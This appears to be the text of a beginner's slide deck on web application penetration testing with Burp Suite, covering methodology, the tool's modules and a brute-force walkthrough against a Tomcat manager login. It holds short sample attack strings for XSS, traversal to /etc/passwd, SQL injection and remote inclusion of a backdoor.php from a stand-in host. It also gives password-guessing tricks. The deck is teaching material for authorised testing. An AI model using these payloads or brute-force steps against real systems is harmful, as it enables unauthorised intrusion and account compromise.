Web Hacking With Burp Suite 101

Introduction to
Web App Pentesting & Burp Suite 101

Build | Protect | Learn
Agenda
2
• $whoami
• Overview of Web App Testing &
Vulnerabilities
• Burp Suite Overview
• Getting Started With Burp Suite
• Automated Testing
• Manual Testing
• Other Features in Burp
• Manual Testing Mindset & Example
• Additional Web Hack Tips N Tricks
• Useful Resources & Conclusion

~$ whoami
3
• InfoSec Geek
• Pentester @ BreakPoint Labs (0xcc_labs)
• Contributor to Primal Security Blog and Podcast
• @b3armunch (Personal Infosec Twitter)
• Certification Enthusiast (OSCP,GWAPT, GPEN,
etc.)
• I Love Knowing What’s Going On (emerging vulns,
tools, PoC), CTFs, Offensive Security Work, Football
and Trying New Beers.

Full Disclosure!
4
• ALWAYS test what your about to learn in a lab environment
or when you have permission!
• What I cover isn’t everything, but it’s enough to hopefully get
you familiar and started with using Burp Suite 

Build | Protect | Learn 5
I Promise NOOOOO…

Overview
6
• Goal: To understand and learn about our “bread & butter” tool (Burp Suite) that we
leverage on every web assessment.
• Motivation: Burp Suite could be one of your foundation tools that you leverage
throughout your entire web assessment.
- Burp Provides manual and automated testing capabilities.
- Burp has a free and paid for version. (currently $349 per year)
• Quick Note: Static vs. Dynamic Web Content
Static Content: Informational web content that tends to lack user features and
capabilities.
Dynamic Content: Content that allows for user input to be passed to the
server.

Web App Testing Methodologies
7
• Having an established testing methodology is an important first step.
• Create Checklists and templates to reassure the assessments process.
• Several great methodologies out there:
Pentesting Execution Standard (PTES)
OWASP Testing Guide (OTG) 4.0
Web Application Hackers Handbook Task Checklist
• Any great methodology will include both Automated and Manual
testing.

Common Web Vulnerabilities
8
• Cross-Site Scripting (XSS): When an attacker can embed scripts in a page that executed
client side (in the user’s web browser).
 <script>alert(“hello”)</script>
• Directory Traversal: Used by an attacker to gain unauthorized access to restricted
directories and resources on the web server.
 index.php?q=../../../../../etc/password
• Cross-Site Request Forgery: An attack that forces an end user to execute unwanted
actions on a web application that the end user is currently authenticated too.
 http://testbank.com/transfer.php?acct=BadBob&amount=500
• Open Redirect Vulnerabilities: An application that takes a parameter and then redirects a
user to the manipulated parameter value without any input validation.
 index.php?redirect=https://badboysite.com

Common Web Vulnerabilities
9
• SQL Injection: A form of code injection used against data driven applications with malicious
SQL statements being inserted into a data entry field or parameter value for execution.
 username: admin’– (Attempts to log you in as the admin user, with the rest of the SQL Query
being ignored.)
• Brute Force Attacks: A trial and error method used to obtain authentication to a web
application. (username, password, pin, etc.)
• Remote File Inclusion (RFI): The ability to include links to remote files through the
exploitation of a vulnerable inclusion procedures implemented on the app.
 http://vulnhost.com/index.php?file=http://badboysite.com/backdoor.php
• Local File Inclusion (LFI): The vulnerability occurs when a page include is not properly
sanitized and an adversary can request a file located on the server through a web browser.

Web App Testing Procedure
10
1) Scoping: Laying the land through a questionnaire or conference call. (Always document
though)
1) Recon & Mapping: What’s the size and technologies of the applications? (Spidering, Mapping
and OSINT)
1) Automated Testing: Scan All The Things! (Utilizing Automated Scanners and open source
testing tools too)
1) Manual Testing: Enumerate potential areas of interest and validated any automated tool
findings (Abuse features, test injection points and reduce false positives)
1) Reporting: Essentially putting all your hard work into one document.
1) Remediation & Review: Provide support and re-testing of findings once remediated

Burp Suite Overview
11
Often Burp will be leveraged for its interception proxy capabilities.
• Proxy: Intercept, Capture and Log Requests
• Spider: Discover Linked Content
• Scanner: Active Web App Vulnerability Scanner
• Intruder: Automate your testing through injection points
• Repeater: Take a request and manipulate it to analyze the response further
• Sequencer: Analyze Tokens (Are they randomly generated?)
• Encoder/Decoder: Take encode or decode strings (URL, Base64, HTML)
• Comparer: Take two things and compare them side by side
• Extender: TONS of extensions to expand the features in Burp

• So Enough Talk….Let’s Actually Learn How to Use Burp!
Let’s Begin

Launching Burp
• Burp Suite is a java jar file that can either be double clicked
or run from the CLI. The following syntax can launch burp:
java –jar –Xmx1024m burpsuite.jar

Burps Proxy
• Burps proxy is an intercepting proxy server that
operates as a man-in-the-middle between your
browser and the target web application.

Setting Up Your Browser

Burps Proxy Settings

Common Issue….

Define Your Scope

Map Your App (Click through)
• Understand the apps purpose
• What Features are allowed?
• Can you sign in?
• View the Source
• Observe the file and directory structure
• What technologies are in use?
(Wappalyzer)
• Is information being displayed that I can
control?
• Does the app appear to interact with a
database?

Spider (Linked Content)

Building Your Site Map
The Site Map Tree View
contains a hierarchical
representation of content, with
URLs broken down into
domains, directories, files,
and parameterized requests.

Spider (Linked Content)

Filter Content In Your Site Map

Filtering Can Lead to…
• Client side comments (Easter eggs the developer left behind!)
• Email Addresses (Potential leveraged for logins)
• Internal Path Disclosure
• Unlinked Files or Paths
• Potentially usernames and passwords (not very likely)
• Technology Enumeration

Analyze Your Target

Target Analyzer Summary
Static Content: Essentially
content that could be considered
“flat files”, meaning what you
see is what you get!
Often times static content is
used to present end users news
or information
Dynamic Content: Allows for
user interaction and
communicates with “back end”
or “server-side” requests from
the application.
Think of a search engine or login
form.

HTTP History & Comments

Automated Testing
28

Automated Testing Will Miss Stuff
• The DHS National NCATS organization reported that 67% of high
impact vulnerabilities required manual testing to enumerate.

Automated Testing Can Break Stuff

Automated Testing Can Take a Long
Time

Automated Testing Can Have False
Positives
• Burp: Right-Click -> [Send to Repeater] [Request in Browser]

Burps Automated Scan Wizard

Burps Automated Scan Queue

Burps Automated Scan Results

Generate a Burp Scan Report

Burp Automated Scan Report
• Burp Scanner Report will include: Finding Issue Details, Severity,
Confidence, Request, Response, etc...

Automated Testing
38

Some Things To Think About
• What technology is in use?
• Ensure that you properly mapped the application
• Enumerate all technology features (File upload, Comments, etc.)
• Enumerate all areas of user input "Injection Points"
• Can you figure what is being done with your input?
• Is your input being presented on the screen? -> XSS
• Is your input calling on stored data? -> SQLi
• Does input generate an action to an external service? -> SSRF
• Does your input call on a local or remote file? -> File Inclusion
• Does your input end up on the file system? -> File Upload
• Think OWASP Top TEN….

OWASP Top Ten Snap Shot
Source: https://www.owasp.org/index.php/Top_10_2013-
Top_10

Analyze Scan Results > Repeater (1)

Test, Modify & Repeat

Analyze Scan Results > Repeater (2)

Verify Results (XSS Example - False
Positive)

Verify Results (XSS Example -Successful)

Think About How Input Is Being Used
Think about how to attack the following parameters and their
values?
http://example-site.com/index.php?redirect=/contact/contact-us.php
http://example-site.com/index.php?file=/app/load.php
http://example-site.com/index.php?name=zack
http://example-site.com/index.php?search=exploitdb
http://example-site.com/index.php?sql=SELECT * FROM USERS

Burps Intruder

Custom Fuzzing
• FuzzDB, Raft Lists, and SecLists provide great lists for customer fuzzing.
• As you start to understand how your input is being leveraged you can
start your fuzzing in an automated manner.
• Burp Suite Pro’s Intruder is my go to tool for web application fuzzing.

Unlinked Content Treasures!
• Use Burps Pre-Built Payload Lists for Fuzzing (Intruder Pro Version Only)
• Use Commonly known lists from tools like Dirbuster or Wfuzz (We can enable
Burp to add any new findings to our site map!)
• Use the “SecLists” collection and it’s lists broken down by the following:
- Passwords
- Usernames
- Discovery (Collection of general and specified directories/ resources)
- Fuzzing (Collection of various payloads sorted by attack type)
- Miscellaneous (Common Ports, Files extensions, list of US cities,
etc.)
- Pattern Matching (Good for the grep utility through file contents)
- IOCs (Indicators of compromise [ Malicious domains, IPs, files, etc.)
- New Feature: RobotsDisallowed (Disallowed directories from the
robots.txt files of the world's top websites--specifically the Alexa 100K.)
^ Source: https://github.com/danielmiessler/SecLists

Define Your Intruder Method
• Sniper – Sends a single set of payloads to a selected parameter(s) value
to identify vulnerabilities.
• Battering Ram – Sends a single payload to all payloads marked at once.
It iterates through the payloads, and places the same payload into all of
the defined payload positions at once.
• Pitchfork – Sends a specific payload to each of the selected parameters
in sequence. Each area of interest is passed its own designated values in
a sequenced series of requests.
• Cluster Bomb – All payloads are tested with all the variables given
meaning that all permutations of payload combinations are tested.
(WARNING this is the largest and longest attack method often)

Burps Intruder Set Your Position

Define the Intruder Payload List

Intruders Results (Status | Length)
Note: You May Want to Uncheck
Payload Encoding If not Needed!!!!

Burp Pro’s Discover Content (Unlinked)

Burps Discover Content Options

Burps Discover Content Session Status

Burps Encoder/Decoder

Burps Comparer
Key: Modified | Deleted | Added

Burps Sequencer

Burps Extender

Manual Testing Mindset & Example
• Now let’s cover a basic example of how we can
compromise a web application through several
features that we can abuse!

Weak Authentication Mechanism
• Very common finding with web application penetration testing
• Often combines several vulnerabilities:
- Username enumeration (Low) +
- Lack of Automation Controls (Low) +
- Lack of Password Complexity Requirements (Low) =
- Account Compromise (Critical)

Weak Authentication: Username
Enumeration
• Password Reset Features “Email address not found”
• Login Error Messages “Invalid Username”
• Timing for login Attempts: Valid = 0.4 secs Invalid = 15 secs
• User Registration “Username already exists”
• Various error messages, and HTML source
• Contact Us Features “Which Admin do you want to contact?”
• Google Hacking and OSINT
• Document Metadata
• Sometimes the application tells you!

Weak Authentication: Automation
Controls
• Pull the authentication request up in Burp’s Repeater and try
it a few times.
• If you see no sign of automation controls send to Burp’s
Intruder for more aggressive testing.
- No account lockout
- No/Weak CAPTCHA
- Main login is strong, but other resources are not
(Mobile Interface, API, etc.)

Weak Authentication: Weak Passwords
• We as humans are bad at passwords…here are some tricks
that work for me:
- Password the same as username
- Variations of “password”: “p@ssw0rd”…
- Month+Year, Season+Year: summer2016…
- Company Name + year
- Keyboard Walks – PW Generator: “!QAZ2wsx”
- My Favorites…Burp Pros Built in Wordlist or SecList
Password Files
• Lots of wordlists out there, consider making a targeted
wordlist using CeWL (scrape sites for unique keywords).
• Research the targeted user’s interests and build lists around
those interests.

Piecing Together What We Know…
• We have enumerated that theirs a valid account named
“tomcat” from the password reset functionality in the forms
based login (Also a default account for Apache Tomcat).
• The application also has basic authentication protecting its “
tomcat manager” login on port 8080 (No lockout built in and
will need to base64 encode payloads).
• We know theirs a lack of password complexity, since we
made a test account with a password of “password”. (create
account feature abuse)
• Let’s leverage Burp’s Intruder to brute force…

Manipulating Our Target Request
1. View our HTTP History Under the Proxy Tab.
2. Find our HTTP Request for the Tomcat
‘/manager/html’ login resource.
3. Send our request to Burps Intruder.

Burp Intruder Payload Configuration
4. Add the § Payload Markers § around the Basic
Authorization Value with the Sniper Attack.

Analyze Your Encoded Payload
To provider further context let’s decode our sample login
attempt to the tomcat login > Send to Burps Decoder >
Base64 Decode and we can see our attempt in plaintext.
(i.e.) tomcat:password

Burp Intruder Payload Set Up
5. Custom Iterator and Position 1 Set 6. Set Position 1 Separator “:”
7. Set Position 2 Password List

Payload Processing Base64 Encode
8. Add a Payload Processing Rule > Encode > Base-64
Encode Your Payload > Properly submits our Brute Force
Attempts!!!

Start Intruder & Review Results
9. Look for a variance in your HTTP Status or Length
of Response From Your Payload Attempts.

ACHIEVEMENT UNLOCKED!!!!

Reconnaissance: Identify New Systems and
Content
• Companies are normally quite surprised about what is exposed to
the Internet.
• How do you tackle large /8’s, /16’s, how do you even build out this
footprint starting with a company name?
- Shodan + Censys.io (3rd Party DBs with Port/Service Info)
- Domain + IP Research (Host, Dig, Whois, etc)
- Masscan + Nmap (Identify open ports and services)
- Whatweb + Wappalayzer (ID Tech Stack)
- Google, Bing, etc. (Search Syntax)
- OSINT: Company Mergers + Acquisitions (Expand Scope?)

Big Scope? Quick Visual: Eye Witness
• EyeWitness is a tool that takes in URLs and creates a report with server
headers + Screen shot of the web GUI
• Extremely useful when facing a large scope

Don’t Judge a System By It’s IP
• Requesting an application URL by IP might give back different content vs.
the domain.
• Load Balancing could exist to where an application could be mirrored
across several IP addresses (Commonly seen with large sites i.e. banks).
• Keep in mind you can have several applications living on the same IP
(Virtual Hosting).
• Pointing an automated tool to “http://ip/” may miss a lot of stuff vs.
“http://ip/AppIsHere/”.

Shot in The Dark “Nikto” Scan
• Open Source web application vulnerability scanner that checks for low
hanging fruit vulnerabilities and some old goodies. (False Positives will
happen!)

Version Specific Vulnerabilities
• Enumerating the technology and version in use go a long way with finding
vulnerabilities (Google + Exploit-db)
• What do I know about the technology and how can I find more
information?

Build Your Own Custom Report
• We leverage Markdown for Custom Reporting to give our reports
in a HTML format. Common Findings Database - Check it out

Useful Resources
• CTFs: Vulnhub, Past CTF Writeups, Pentester Lab
• Training: GWAPT , Offensive Security
• Book: Web Application Hackers Handbook
• Talk: How to Shot Web - Jason Haddix
• Talk: How to be an InfoSec Geek - Primal Security
• Talk: File in the hole! - Soroush Dalili
• Talk: Polyglot Payloads in Practice - Marcus Niemietz
• Talk: Running Away From Security - Micah Hoffman
• Github Resource: Security Lists For Fun & Profit
• BPL Blog Post on this Talk:

Conclusion
Email: zmeyers@breakpoint-labs.com
• Burp Suite is a great baseline
tool to leverage in all your future
web assessments.
• OWASP has a large abundance
of information to reference and
learn from.
• Read blogs and twitter whenever
possible, often times dozens of
web vulnerabilities and potential
exploits are released every day.

Web Hacking With Burp Suite 101

Recommandé

Recommandé

Contenu connexe

Tendances

Tendances (20)

En vedette

En vedette (20)

Similaire à Web Hacking With Burp Suite 101

Similaire à Web Hacking With Burp Suite 101 (20)

Dernier

Dernier (20)

Web Hacking With Burp Suite 101